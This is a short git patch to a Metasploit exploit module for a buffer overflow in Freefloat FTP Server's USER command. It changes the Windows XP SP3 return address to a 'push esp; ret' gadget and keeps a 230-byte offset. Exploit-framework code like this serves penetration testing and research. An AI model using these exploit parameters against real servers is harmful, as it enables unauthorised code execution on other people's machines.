From d64208a6049ed2345992ee4dfbedb944bfe4c3cc Mon Sep 17 00:00:00 2001 From: Doug Prostko Date: Wed, 12 Sep 2012 18:46:53 -0400 Subject: [PATCH] changed return address --- modules/exploits/windows/ftp/freefloatftp_user.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 32c2708e4b..aa172070d0 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -47,7 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote [ [ 'Windows XP SP3', { - 'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll + 'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll 'Offset' => 230 } ], @@ -75,5 +75,4 @@ class Metasploit4 < Msf::Exploit::Remote send_user(buf) disconnect end - end